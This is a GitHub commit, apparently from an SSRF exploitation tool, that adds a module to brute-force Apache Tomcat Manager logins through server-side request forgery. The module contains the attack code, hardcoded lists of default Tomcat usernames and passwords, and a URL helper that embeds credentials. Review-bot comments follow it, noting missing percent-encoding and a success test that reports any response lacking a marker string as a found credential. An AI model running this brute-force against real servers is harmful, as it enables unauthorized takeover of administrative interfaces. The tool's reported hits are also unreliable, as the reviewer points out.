MODULE - Tomcat module - bruteforce attack against manager
swisskyrepo committed Dec 29, 2018
1 parent ec40fe1 commit e8751bb
Showing 4 changed files with 35 additions and 1 deletion.
1 change: 1 addition & 0 deletions README.md
@@ -69,6 +69,7 @@ The following modules are already implemented and can be used with the `-m` argu
| `digitalocean` | Read files from the provider (e.g: meta-data, user-data) |
| `socksproxy` | SOCKS4 Proxy |
| `smbhash` | Force an SMB authentication via a UNC Path |
| `tomcat` | Bruteforce attack against Tomcat Manager |

## Contribute

4 changes: 3 additions & 1 deletion core/utils.py
@@ -14,7 +14,9 @@ def wrapper_gopher(data, ip, port):
def wrapper_dict(data, ip, port):
return "dict://{}:{}/{}".format(ip, port, data)

def wrapper_http(data, ip, port):
def wrapper_http(data, ip, port, usernm=False, passwd=False):
if usernm != False and passwd != False:
return "http://{}:{}@{}:{}/{}".format(usernm, passwd, ip, port, data)
return "http://{}:{}/{}".format(ip, port, data)

def wrapper_https(data, ip, port):
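Review bot: In `wrapper_http`, `usernm` and `passwd` are formatted into the userinfo part of the URL without percent-encoding, so a value containing `@`, `:` or `/` changes how the resulting URL is parsed and the authority component no longer means what the caller intended. Encoding each value before formatting, e.g. `quote(usernm, safe="")` from `urllib.parse`, keeps the host and port where they belong; the import would have to be added at the top of core/utils.py, which is outside this hunk. The `False` defaults compared with `!= False` also read oddly for string parameters: `usernm=None, passwd=None` with `if usernm is not None and passwd is not None:` is the usual form and behaves the same for callers that omit both arguments. A one-line docstring saying that credentials are embedded only when both are supplied would document the new branch.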
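--- a/modules/tomcat.py
+++ b/modules/tomcat.py
@@ -0,0 +1,31 @@
+from core.utils import *
+import logging
+
+name = "tomcat"
+description = "Tomcat - Bruteforce manager"
+author = "Swissky"
+documentation = [
+"https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html",
+"https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown"
+]
+
+class exploit():
+SERVER_HOST = "127.0.0.1"
+SERVER_PORT = "8888"
+SERVER_TOMCAT = "manager/html"
+tomcat_user = ["tomcat", "admin", "both", "manager", "role1", "role", "root"]
+tomcat_pass = ["password", "tomcat", "admin", "manager", "role1", "changethis", "changeme", "r00t", "root", "s3cret","Password1", "password1"]
+
+def __init__(self, requester, args):
+logging.info("Module '{}' launched !".format(name))
+
+# Using a generator to create the host list
+gen_host = gen_ip_list(self.SERVER_HOST, args.level)
+for ip in gen_host:
+for usr in self.tomcat_user:
+for pss in self.tomcat_pass:
+payload = wrapper_http(self.SERVER_TOMCAT, ip, self.SERVER_PORT, usernm=usr, passwd=pss)
+r = requester.do_request(args.param, payload)
+
+if not "s3cret" in r.text:
+logging.info("Found credential \033[32m{}\033[0m:\033[32m{}\033[0m".format(usr, pss))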
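Review bot: The success test `if not "s3cret" in r.text:` at the end of `__init__` depends on an unexplained marker string and needs a comment; presumably `s3cret` is the sample password shown on Tomcat's 401 page for the manager application, so its absence is read as an accepted login. As written, every response that lacks the marker, including an empty body or an error page from the requesting endpoint itself, is logged as a found credential, so each logged hit is unverified until the response is inspected. A comment such as `# Tomcat's 401 page for the manager shows the sample password "s3cret"; any response without it is reported as a hit and must be verified` records that limitation, and `"s3cret" not in r.text` is the idiomatic spelling of the condition. `from core.utils import *` also hides where `gen_ip_list` and `wrapper_http` come from; `from core.utils import gen_ip_list, wrapper_http` would make the dependency explicit.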
Binary file added screenshot/tomcat_example_ssrf.png
